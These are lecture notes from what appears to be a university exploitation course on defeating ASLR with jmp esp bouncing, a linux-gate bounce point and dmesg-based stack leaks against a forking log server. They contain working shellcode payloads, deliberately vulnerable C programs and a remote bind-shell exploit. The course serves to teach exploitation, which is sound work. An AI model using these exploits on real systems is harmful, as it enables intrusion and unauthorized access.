Lec. 17: Defeating ASLR by Bouncing and Basing
1 Bouncing to Defeat ASLR
One thing we learned by brute forcing ASLR is that randomness may not be as random as we want it to be. However, things get worse when something is completely un-random. It doesn't help that the stack is random if some other part of the code is not random. If that non-random region happened to hold some instruction that would be useful, and it was always in that same spot, then we could use it as part of our exploit.
2 Call/Jmp esp bounce
What are we looking for exactly? Two instructions are particularly useful: jmp esp and call esp. They are useful because of where esp ends up once a function's return address has been popped off the stack. Consider the leave and ret instructions, which are equivalent to the following:
leave --> mov esp,ebp
          pop ebp
ret   --> pop eip
The leave instruction deallocates the stack frame and resets ebp to the saved base pointer. The ret instruction then pops the return address off the stack and loads it into the instruction pointer. The question is: what does the stack look like when that procedure finishes, and what is esp referencing? Let's look at a situation where we are using an exploit like so:
                                            .-----------.
                                            |           |
                                            |           v
./vulnerable 5 <--------padding-----><return-address><shell code>
Our stack would look like this as we move through the epilogue:
                        leave->mov esp,ebp       ret->pop eip
                               pop ebp

                         ebp->| ???     |        ebp->| ???     |
       .---------.            |---------|             |---------|
       |  s  c   |            |  s  c   |             |  s  c   |
       |  h  o   |            |  h  o   |             |  h  o   |
       |  e  d   |            |  e  d   |             |  e  d   |
       |  l  e   |            |  l  e   |             |  l  e   |
       |  l      |            |  l      |      esp->  |  l      |
       |---------|            |---------|             '---------'
       | ret. ad.|       esp->| ret. ad.|
       |---------|            '---------'
ebp->  |  sbp    |
       |---------|
       |         |
       :         :
       .         .
esp->  |         |
       '---------'
And looky there, esp is pointing right at our shell code. So, if we knew the location of a jmp esp or call esp instruction, we could write that address as the return address, and that would then execute our shell code. This is called bouncing.
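To make the epilogue concrete, here is a toy Python 3 model of leave followed by ret. It is only a sketch: the stack is a dictionary, and every address in it (SAVED_EBP_SLOT, JMP_ESP) is made up for illustration rather than taken from a real run.

```python
# Toy model of the epilogue `leave; ret` on a 32-bit stack.
# All addresses below are hypothetical and chosen only for illustration.

def run_epilogue(stack, ebp):
    """Simulate `leave` then `ret`; return the resulting (eip, esp, ebp)."""
    # leave: mov esp, ebp ; pop ebp
    esp = ebp
    ebp = stack[esp]
    esp += 4
    # ret: pop eip
    eip = stack[esp]
    esp += 4
    return eip, esp, ebp

SAVED_EBP_SLOT = 0xBFFFF000   # hypothetical address holding the saved ebp
JMP_ESP = 0x080484B0          # hypothetical address of a `jmp esp`

stack = {
    SAVED_EBP_SLOT: 0x41414141,            # saved ebp, clobbered by padding
    SAVED_EBP_SLOT + 4: JMP_ESP,           # overwritten return address
    SAVED_EBP_SLOT + 8: "shellcode[0:4]",  # first word of the shell code
}

eip, esp, ebp = run_epilogue(stack, SAVED_EBP_SLOT)
print(hex(eip), hex(esp), stack[esp])
```

After the simulated ret, eip holds the bounce address and esp is the slot immediately above the return address, which is exactly where the shell code starts.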
2.1 Finding a bounce point
To start, we need to know what bytes constitute a jmp esp or a call esp.
user@si485H-base:demo$ objdump -d -M intel jmpcall_esp

jmpcall_esp:     file format elf32-i386

Disassembly of section .text:

08048060 <_start>:
 8048060:   ff e4     jmp    esp
 8048062:   ff d4     call   esp
So, in our code, we are looking for \xff\xe4 or \xff\xd4. To see how this works, I've modified the vulnerable program we've been working with as follows:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void jmpesp_embedding(){
  asm("jmp *%esp");//add a jmp esp instruction here to find
}

void bad(){
  printf("You've been naughty!\n");
}

void good(){
  printf("Go Navy!\n");
}

void vuln(int n, char * str){
  int i = 0;
  char buf[32];

  strcpy(buf,str);

  while( i < n ){
    printf("%d %s\n",i++, buf);
  }
}

int main(int argc, char *argv[]){
  vuln(atoi(argv[1]), argv[2]);
  return 0;
}
The function jmpesp_embedding uses C's inline assembly, the asm() statement, to put a jmp esp instruction into the compiled code at a consistent place. In particular, it will be in the text segment, which is not randomized for this executable. The reason is fairly clear when you think about it: the code contains a lot of hard jumps and calls that require knowing the addresses of other functions. Those addresses can't be changed willy-nilly, so the text segment can't be randomized like the stack, where everything is relative to the stack and base pointers.
To learn the address of our bounce point, we can look at the objdump output.
080484ad <jmpesp_embedding>:
 80484ad:   55        push   ebp
 80484ae:   89 e5     mov    ebp,esp
 80484b0:   ff e4     jmp    esp
 80484b2:   5d        pop    ebp
 80484b3:   c3        ret
At address 0x080484b0 we have a jmp esp, so we use that address to overwrite the return address. Below, I use the same smallest (21-byte) shell code as before:
user@si485H-base:demo$ ./vulnerable 1 `python -c "print 'A'*(0x2c+0x4) + '\xb0\x84\x04\x08' + '\x31\xc9\xf7\xe1\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80'"`
$ cat /proc/sys/kernel/randomize_va_space
2
$
And, on the first try, BAM!, and look, no NOP sled. As you can see, this is with address space randomization. This just got easy … sort of.
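Reading objdump by eye works for a planted instruction, but the search for \xff\xe4 and \xff\xd4 is easy to automate. The following Python 3 sketch scans a byte string for either pair; the helper name find_bounce_offsets is my own, and the sample bytes are the body of jmpesp_embedding copied from the objdump listing. Note that when you scan a whole file, the offsets are file offsets, which you still have to translate to load addresses.

```python
JMP_ESP = b"\xff\xe4"   # encoding of `jmp esp`
CALL_ESP = b"\xff\xd4"  # encoding of `call esp`

def find_bounce_offsets(data):
    """Return sorted (offset, name) pairs for every jmp esp / call esp in data."""
    hits = []
    for name, pattern in (("jmp esp", JMP_ESP), ("call esp", CALL_ESP)):
        start = data.find(pattern)
        while start != -1:
            hits.append((start, name))
            start = data.find(pattern, start + 1)
    return sorted(hits)

# Bytes of jmpesp_embedding, which objdump shows starting at 0x080484ad.
sample = bytes.fromhex("5589e5ffe45dc3")
base = 0x080484AD

for offset, name in find_bounce_offsets(sample):
    print(name, hex(base + offset))
```

The same function could be pointed at the contents of any non-randomized region, since the byte pair does not have to come from an intended instruction to work as a bounce point.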
2.2 Bouncing off Linux Gate (Linux 2.6.X)
People have known about this technique for a while, so they try hard to get rid of bounce points, but that was not always the case. Let's take a trip down memory lane to 2006, when the Linux 2.6.X kernel was kind. Ubuntu 6.06 (the so-called Dapper Drake) was released that year; for reference, we are now up to 14.04.
In the Linux 2.6.X kernels, there was a problem with address space randomization and the loading of some shared libraries: their map locations were not random. We can investigate this on an Ubuntu 6.06 VM I've got running.
We can run the same tests to check out the randomness as we did in the last lesson:
user@ubuntu-6-06:~/si485h-class-demos/class/16$ uname -a
Linux ubuntu-6-06 2.6.15-26-386 #1 PREEMPT Thu Aug 3 02:52:00 UTC 2006 i686 GNU/Linux
user@ubuntu-6-06:~/si485h-class-demos/class/16$ for i in `seq 1 1 100`; do ./rand_sample ; done | python random_bits.py
Consitent: 10111111100000000000000000000100 0xBF800004L
  Changed: 11111111100000000000000000001111 19
And we do see that, yes, there is in fact randomization going on, but it is not quite as it seems. Let's see what happens when we look at the maps:
user@ubuntu-6-06:~/si485h-class-demos/class/16$ ./busy_wait &
[2] 10252
user@ubuntu-6-06:~/si485h-class-demos/class/16$ cat /proc/10252/maps
08048000-08049000 r-xp 00000000 08:01 614242     /home/user/si485h-class-demos/class/16/busy_wait
08049000-0804a000 rwxp 00000000 08:01 614242     /home/user/si485h-class-demos/class/16/busy_wait
b7e36000-b7e37000 rwxp b7e36000 00:00 0
b7e37000-b7f5c000 r-xp 00000000 08:01 597932     /lib/tls/i686/cmov/libc-2.3.6.so
b7f5c000-b7f61000 r-xp 00125000 08:01 597932     /lib/tls/i686/cmov/libc-2.3.6.so
b7f61000-b7f64000 rwxp 0012a000 08:01 597932     /lib/tls/i686/cmov/libc-2.3.6.so
b7f64000-b7f66000 rwxp b7f64000 00:00 0
b7f70000-b7f72000 rwxp b7f70000 00:00 0
b7f72000-b7f87000 r-xp 00000000 08:01 566182     /lib/ld-2.3.6.so
b7f87000-b7f89000 rwxp 00014000 08:01 566182     /lib/ld-2.3.6.so
bfd71000-bfd87000 rwxp bfd71000 00:00 0          [stack]
ffffe000-fffff000 ---p 00000000 00:00 0          [vdso]
user@ubuntu-6-06:~/si485h-class-demos/class/16$ killall busy_wait
user@ubuntu-6-06:~/si485h-class-demos/class/16$ ./busy_wait &
[3] 10276
[2]   Terminated              ./busy_wait
user@ubuntu-6-06:~/si485h-class-demos/class/16$ cat /proc/10276/maps
08048000-08049000 r-xp 00000000 08:01 614242     /home/user/si485h-class-demos/class/16/busy_wait
08049000-0804a000 rwxp 00000000 08:01 614242     /home/user/si485h-class-demos/class/16/busy_wait
b7e3e000-b7e3f000 rwxp b7e3e000 00:00 0
b7e3f000-b7f64000 r-xp 00000000 08:01 597932     /lib/tls/i686/cmov/libc-2.3.6.so
b7f64000-b7f69000 r-xp 00125000 08:01 597932     /lib/tls/i686/cmov/libc-2.3.6.so
b7f69000-b7f6c000 rwxp 0012a000 08:01 597932     /lib/tls/i686/cmov/libc-2.3.6.so
b7f6c000-b7f6e000 rwxp b7f6c000 00:00 0
b7f78000-b7f7a000 rwxp b7f78000 00:00 0
b7f7a000-b7f8f000 r-xp 00000000 08:01 566182     /lib/ld-2.3.6.so
b7f8f000-b7f91000 rwxp 00014000 08:01 566182     /lib/ld-2.3.6.so
bfc79000-bfc8f000 rwxp bfc79000 00:00 0          [stack]
ffffe000-fffff000 ---p 00000000 00:00 0          [vdso]
You'll notice that some things move around, but the [vdso] does not. What is that? It is the Linux kernel's entry point for system calls, the so-called Linux gate. Using the ldd tool, we can see it listed as linux-gate.so.1:
user@ubuntu-6-06:~/si485h-class-demos/class/16$ ldd busy_wait
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7e20000)
        /lib/ld-linux.so.2 (0xb7f5b000)
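Spotting what stays put across two maps listings can also be scripted. The Python 3 sketch below compares two /proc/PID/maps dumps and reports the labeled regions whose start address did not change. The function names are my own, and RUN_1 and RUN_2 are abbreviated copies of the two listings from the Ubuntu 6.06 VM, so treat this as an illustration rather than a finished tool.

```python
def parse_maps(text):
    """Map each region label (a path or [name]) to its lowest start address."""
    regions = {}
    for line in text.strip().splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue  # anonymous mapping with no label
        start = int(fields[0].split("-")[0], 16)
        label = fields[5]
        regions[label] = min(start, regions.get(label, start))
    return regions

def fixed_regions(run_a, run_b):
    """Return the labels that sit at the same start address in both runs."""
    a, b = parse_maps(run_a), parse_maps(run_b)
    return sorted(label for label in a if label in b and a[label] == b[label])

RUN_1 = """
08048000-08049000 r-xp 00000000 08:01 614242 /home/user/si485h-class-demos/class/16/busy_wait
b7e37000-b7f5c000 r-xp 00000000 08:01 597932 /lib/tls/i686/cmov/libc-2.3.6.so
bfd71000-bfd87000 rwxp bfd71000 00:00 0 [stack]
ffffe000-fffff000 ---p 00000000 00:00 0 [vdso]
"""

RUN_2 = """
08048000-08049000 r-xp 00000000 08:01 614242 /home/user/si485h-class-demos/class/16/busy_wait
b7e3f000-b7f64000 r-xp 00000000 08:01 597932 /lib/tls/i686/cmov/libc-2.3.6.so
bfc79000-bfc8f000 rwxp bfc79000 00:00 0 [stack]
ffffe000-fffff000 ---p 00000000 00:00 0 [vdso]
"""

for label in fixed_regions(RUN_1, RUN_2):
    print("not randomized:", label)
```

On these two samples only the program's own text and the [vdso] keep their addresses, while libc and the stack move.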
What's in this non-randomized location? Well, let's see if it at least has what we need, and we can search it using a very simple C program:
#include <stdio.h>
#include <stdlib.h>

int main(){

  unsigned long linuxgate_start=0xffffe000;
  unsigned char *ptr = (unsigned char *) linuxgate_start;

  int i;

  //stop one byte short of the page so that ptr[i+1] stays inside it
  for(i=0;i<4096-1 /*one page*/; i++){
    if ( ptr[i] == 0xff && ptr[i+1] == 0xe4){
      printf("Found jmp esp at %p\n", (void *) (ptr+i));
    }
  }

  return 0;
}
user@ubuntu-6-06:~/si485h-class-demos/class/17$ ./search_gate
Found jmp esp at 0xffffe777
So we can now use that address as our bounce point to exploit the vulnerable program. Here's that vulnerable program being exploited, again.
user@ubuntu-6-06:~/si485h-class-demos/class/17$ ./vulnerable 1 `python -c "print 'A'*(0x20+0x8) + '\x77\xe7\xff\xff' + '\x31\xc9\xf7\xe1\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80'"`
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

user@ubuntu-6-06:/home/user/si485h-class-demos/class/17$ exit     #<--- here I'm in the shell
exit
user@ubuntu-6-06:~/si485h-class-demos/class/17$
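Both bounce exploits so far share one layout: padding up to the return address, the bounce address in little-endian byte order, then the shell code. Here is a small Python 3 sketch of that layout. The helper bounce_payload is a name I made up, and the padding lengths and addresses are simply the ones from the two command lines in this lesson.

```python
import struct

def bounce_payload(pad_len, bounce_addr, shellcode):
    """Build padding + little-endian bounce address + shell code."""
    return b"A" * pad_len + struct.pack("<I", bounce_addr) + shellcode

# The 21-byte shell code used in both command lines.
SHELLCODE = bytes.fromhex("31c9f7e150686e2f7368682f2f626989e3b00bcd80")

# Planted jmp esp in the modified vulnerable program.
local = bounce_payload(0x2C + 0x4, 0x080484B0, SHELLCODE)

# jmp esp found inside linux-gate on the Ubuntu 6.06 VM.
gate = bounce_payload(0x20 + 0x8, 0xFFFFE777, SHELLCODE)

print(local.hex())
print(gate.hex())
```

The one-liners in this lesson are Python 2, where print emits raw bytes. In Python 3 you would write the payload with sys.stdout.buffer.write(payload) instead of print to get the same bytes on the command line.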
3 Basing from dmesg
Another strategy for circumventing ASLR is called basing, where, through some side channel, you learn the offset or the base address of the loaded page, which reveals where to jump. This can be done remotely or locally; here we'll focus on using dmesg to reveal the base of the map and our jump point.
3.1 dmesg
dmesg prints the kernel log, which is available to the user. It reports things like network setup and teardown, and also information about segmentation faults, which is what we will use today.
For example, let's consider segfaulting (on purpose) our vulnerable program:
user@si485H-base:demo$ ./vulnerable 1 `python -c "print 'A'*100"`
Segmentation fault (core dumped)
user@si485H-base:demo$ dmesg | tail -1
[2876532.997490] vulnerable[23836]: segfault at 41414141 ip 41414141 sp bf973950 error 14
The program crashed; this was reported by the operating system and logged in dmesg. Looking more closely, the reason it crashed is that the instruction pointer was overwritten with a bunch of A's (0x41414141).
More importantly, the stack pointer at the time of the crash is also revealed, 0xbf973950, which places the stack for this run at around 0xbf900000, the base we need!
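Pulling the fields out of such a log line is simple to script. The Python 3 sketch below parses the segfault line format shown in this lesson; the regular expression and the name parse_segfault are my own, and the exact dmesg format can differ between kernel versions, so adjust as needed.

```python
import re

# Matches lines such as:
# [2876532.997490] vulnerable[23836]: segfault at 41414141 ip 41414141 sp bf973950 error 14
SEGFAULT_RE = re.compile(
    r"(?P<prog>\S+)\[(?P<pid>\d+)\]: segfault at (?P<addr>[0-9a-f]+) "
    r"ip (?P<ip>[0-9a-f]+) sp (?P<sp>[0-9a-f]+) error (?P<err>\d+)"
)

def parse_segfault(line):
    """Return the fields of a dmesg segfault line, or None if it does not match."""
    m = SEGFAULT_RE.search(line)
    if m is None:
        return None
    return {
        "prog": m.group("prog"),
        "pid": int(m.group("pid")),
        "addr": int(m.group("addr"), 16),
        "ip": int(m.group("ip"), 16),
        "sp": int(m.group("sp"), 16),
        "error": int(m.group("err")),
    }

line = ("[2876532.997490] vulnerable[23836]: segfault at 41414141 "
        "ip 41414141 sp bf973950 error 14")
info = parse_segfault(line)
print(info["prog"], hex(info["ip"]), hex(info["sp"]))
```

The sp field is the leak we care about: it is a real stack address from the crashed process.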
3.2 On fork() and memory space
Another item we can leverage is that a fork()'ed process has the same memory layout as its parent: the child gets a copy of the parent's address space, so every address is the same in both. For example, here is a sample program:
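#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>

int main(){
  int a = 10;

  if ( fork() == 0){
    //child
    printf("Child: %p\n", (void *) &a);
  }else{
    printf("Parent: %p\n", (void *) &a);
  }

  wait(NULL); //the parent reaps the child; in the child this returns right away
  return 0;
}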
user@si485H-base:demo$ ./fork_rand_sample
Parent: 0xbf9ced9c
Child: 0xbf9ced9c
Why is this important? Well, many logging and backend systems must work asynchronously, so for each request they fork and have a child complete the task. If we can get the child to crash, there will be a log message in dmesg, but the parent will persist. That's exactly what we need to attack the parent process: the crash reveals addresses that are still valid in the parent and in every child it forks afterwards.
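The "child crashes, parent persists" behavior is easy to see in a few lines. This Python 3 sketch forks, has the child deliver SIGSEGV to itself to stand in for a real memory fault, and lets the parent observe how the child died. The function name is my own, and it assumes a POSIX system where os.fork is available.

```python
import os
import signal

def crash_child_and_report():
    """Fork, crash the child with SIGSEGV, and return the signal the parent saw."""
    pid = os.fork()
    if pid == 0:
        # Child: stand in for a memory fault by signaling ourselves.
        os.kill(os.getpid(), signal.SIGSEGV)
        os._exit(1)  # only reached if the signal did not terminate us
    # Parent: still alive, and able to see how the child ended.
    _, status = os.waitpid(pid, 0)
    if os.WIFSIGNALED(status):
        return os.WTERMSIG(status)
    return None

sig = crash_child_and_report()
print("parent survived; child terminated by signal", sig)
```

A forking server is in the same position as the parent here: each crashed child costs it nothing, so we can crash children repeatedly while we probe.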
3.3 Basing a logging engine
Below is a sample logging utility that uses a socket to accept new messages:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

const char logfile[]="log.dat";

void handle_client(int sock);
void hello(int sock);
void logmsg(int sock, char * msg);
char * getmsg(int sock);

void hello(int sock){
  struct sockaddr_in client_addr;
  socklen_t sin_size ;
  char hello[100];

  getpeername(sock, (struct sockaddr *) &client_addr, &sin_size);

  sprintf(hello,"Hello %s: Send log message\n", inet_ntoa(client_addr.sin_addr));
  printf("%s",hello);

  write(sock,hello,strlen(hello));
}

char * getmsg(int sock){
  int size=20;
  char * response = malloc(size);
  char buf[10];
  int n=0,i=0;

  //read a log msg, reallocate as needed
  while( (n = read(sock,buf,10)) > 0){
    if (i+n >= size){ //keep one byte free for the null terminator
      size*=2; //double size
      response = realloc(response, size);
    }
    strncpy(&response[i],buf,n);//write into response
    i+=n; //move forward the counter
  }
  response[i]='\0' ; //null terminate
  return response;
}

void logmsg(int sock, char * msg){
  char event[50];

  //create event string (the length of msg is never checked)
  sprintf(event,"[%d] %s\n", time(NULL), msg);

  //open the logfile
  FILE * fstream = fopen(logfile,"a");

  //log the event
  fprintf(fstream,event);

  //close the file
  fclose(fstream);

  //write response to client
  write(sock,event,strlen(event));

  return;
}

void handle_client(int sock){
  //do hello
  printf("Handle Client!\n");
  hello(sock);

  //get msg
  char * msg = getmsg(sock);

  //log response
  logmsg(sock,msg);

  //deallocate
  free(msg);

  char goodbye[]="Goodbye!\n";
  write(sock, goodbye,strlen(goodbye));

  shutdown(sock,2);
  close(sock);
}

int main(void){
  int server, client; //server and client socket
  struct sockaddr_in host_addr; //address structures
  int yes=1,gonavy=1;

  //open new socket for server
  server = socket(AF_INET, SOCK_STREAM, 0);

  //set up server address
  memset(&(host_addr), '\0', sizeof(struct sockaddr_in));
  host_addr.sin_family=AF_INET;
  host_addr.sin_port=htons(2525);
  host_addr.sin_addr.s_addr=INADDR_ANY;

  //bind server socket
  if(bind(server, (struct sockaddr *) &host_addr, sizeof(struct sockaddr)) < 0){
    perror("bind");
    return 1;
  }

  //set up listening queue
  listen(server,4);

  //accept incoming connection
  while (1){
    client = accept(server, NULL,NULL);
    if( client < 0 ){
      perror("accept");
      break;
    }

    if( fork() == 0){
      //handle each client in the child
      handle_client(client);
      exit(0); //the child is done, do not fall back into the accept loop
    }
  }

  return 0;
}
The gist of the program is that the server waits for incoming connections and, for each client, forks a new logging process that will open the log file and deposit the message. Looking closely, we see that the logmsg() function has a vulnerability when calling sprintf(): the length of msg is never checked against the length of the event buffer.
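To see how little room the event buffer really has, we can do the arithmetic on the format string "[%d] %s\n". This Python 3 sketch counts the bytes sprintf() would write, including the terminating null. The helper names are my own, and the timestamp is one of the values that shows up in this lesson's output.

```python
EVENT_BUF_SIZE = 50  # char event[50] in logmsg()

def event_bytes(timestamp, msg):
    """Bytes sprintf(event, "[%d] %s\\n", ...) writes, including the trailing NUL."""
    return len("[%d] %s\n" % (timestamp, msg)) + 1

def max_safe_msg_len(timestamp, buf_size=EVENT_BUF_SIZE):
    """Longest msg that still fits in the buffer for this timestamp."""
    return buf_size - event_bytes(timestamp, "")

ts = 1445621763
print("longest safe message:", max_safe_msg_len(ts))
print("bytes written for 50 A's plus newline:", event_bytes(ts, "A" * 50 + "\n"))
```

With a ten-digit timestamp the prefix alone takes 13 bytes, so anything much longer than a short sentence runs past the end of event and into the rest of the stack frame.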
Consider how this tool might be used on a host machine. The logging server has access to a log file that the client cannot read. However, the server allows a client to write to the file. The goal of the nefarious client is to gain access to the log file, essentially, to gain the privilege level of the server.
Let's consider how to do this by first starting the server in one terminal and probing it in another. When we connect, we see the following:
user@si485H-base:demo$ netcat localhost 2525
Hello 0.5.119.183: Send log message
loging
[1445621763] loging
Goodbye!
Let's start sending it a bit more stuff …
user@si485H-base:demo$ python -c "print 'A'*50" | netcat localhost 2525
Hello 0.5.119.183: Send log message
[1445621810] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAA
^C
That seemed to cause a problem, so let's check the dmesg output:
user@si485H-base:demo$ dmesg | tail -1
[2877400.157327] logger[23967]: segfault at a0a35 ip 08048af3 sp bfe11eb0 error 4 in logger[8048000+1000]
There you go, we see that we caused a segfault. Notice the ip is still mostly intact, so let's increase the length of our string until we see 0xdeadbeef for the ip.
user@si485H-base:demo$ python -c "print 'A'*50 + '\xef\xbe\xad\xde'" | netcat localhost 2525
Hello 0.5.119.183: Send log message
[1445621998] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAᆳ?
^C
user@si485H-base:demo$ dmesg | tail -1
[2877588.654685] logger[24018]: segfault at a0ade ip 000a0ade sp bfe11eb0 error 14 in logger[8048000+1000]
user@si485H-base:demo$ python -c "print 'A'*51 + '\xef\xbe\xad\xde'" | netcat localhost 2525
Hello 0.0.0.0: Send log message
^C^C
user@si485H-base:demo$ dmesg | tail -1
[2877595.667371] logger[24024]: segfault at a0adead ip 0a0adead sp bfe11eb0 error 14
user@si485H-base:demo$ python -c "print 'A'*52 + '\xef\xbe\xad\xde'" | netcat localhost 2525
Hello 0.5.119.183: Send log message
^C
user@si485H-base:demo$ dmesg | tail -1
[2877604.881940] logger[24030]: segfault at adeadbe ip 0adeadbe sp bfe11eb0 error 14
user@si485H-base:demo$ python -c "print 'A'*53 + '\xef\xbe\xad\xde'" | netcat localhost 2525
Hello 0.5.119.183: Send log message
^C
user@si485H-base:demo$ dmesg | tail -1
[2877612.426441] logger[24036]: segfault at deadbeef ip deadbeef sp bfe11eb0 error 15
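Instead of adding one byte at a time, a single crash already tells us how far off we are: the low bytes of the faulting ip are the tail of our little-endian marker. The Python 3 sketch below works out how many more padding bytes are needed from one observed ip. The function name is my own, and the values checked are the ip fields from the dmesg lines in this run.

```python
import struct

def extra_padding_needed(observed_ip, marker=0xDEADBEEF):
    """How many more padding bytes until the marker fully overwrites the return address.

    Returns None when no part of the marker shows up in the observed ip.
    """
    ip_bytes = struct.pack("<I", observed_ip)      # bytes as laid out on the stack
    marker_bytes = struct.pack("<I", marker)
    for k in range(4, 0, -1):
        # The first k bytes of the return address hold the last k marker bytes.
        if ip_bytes[:k] == marker_bytes[-k:]:
            return 4 - k
    return None

for padding, ip in ((50, 0x000A0ADE), (51, 0x0A0ADEAD), (52, 0x0ADEADBE), (53, 0xDEADBEEF)):
    print(padding, "+", extra_padding_needed(ip), "more bytes of padding")
```

Every probe in the run points at the same total, 53 bytes of padding, which matches the attempt that finally put 0xdeadbeef in the ip.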
Now we control the instruction pointer, and notice that the stack pointer has been consistent the whole time. All we need to do now is add some shell code; our remote shell code will do. But what do we set the return address to? To wherever the stack pointer was when we crashed, since that is where the bytes following the return address land. That address is 0xbfe11eb0:
user@si485H-base:demo$ printf `./hexify.sh assembly_rsh` > shellcode
user@si485H-base:demo$ python -c "print 'A'*53 + '\xb0\x1e\xe1\xbf'+open('shellcode').read().strip()" | netcat localhost 2525
Hello 0.5.119.183: Send log message
^C
It looks like it might not have worked, but if you look at the dmesg output, you see there is no new segfault:
user@si485H-base:demo$ dmesg | tail -1
[2877708.087115] logger[24055]: segfault at deadbeef ip deadbeef sp bfe11eb0 error 15
So let's try connecting to our remote shell:
user@si485H-base:demo$ netcat localhost 31337
ls log.dat
log.dat
cat log.dat
[1445621763] loging
[1445621810] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAA
[1445621927]
[1445621931] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAᆳ?
[1445621939] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAAAAAAᆳ?
[1445621947] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAAAAAAAAAAᆳ?
[1445621957] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAAAAAAAAᆳ?
[1445621967] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAAAAAAᆳ?
[1445621979] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAAAAAAAAᆳ?
[1445621988] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAAAAAAAᆳ?
[1445621998] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAᆳ?
[1445622005] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAAᆳ?
[1445622014] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAAAᆳ?
[1445622022] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`?AAAAAAAAAAAAᆳ?
[1445622117] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP?AAAAAAAAAAAAᆳ?1?Pjj??1?C?f̀??1?Pfhzifj??jQV1۳??f̀1ɱQV??1۳1??f̀1?QQV??1۳1??f̀?Ɖ?1?1???̀A1???̀A1???̀1???Qh//shh/bin?? ̀
[1445622202] AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP?AAAAAAAAAAAA??1?Pjj??1?C?f̀??1?Pfhzifj??jQV1۳??f̀1ɱQV??1۳1??f̀1?QQV??1۳1??f̀?Ɖ?1?1???̀A1???̀A1???̀1???Qh//shh/bin?? ̀
BOOM! We got a remote shell and access to the log file and address space randomization was not a problem because we learned the base.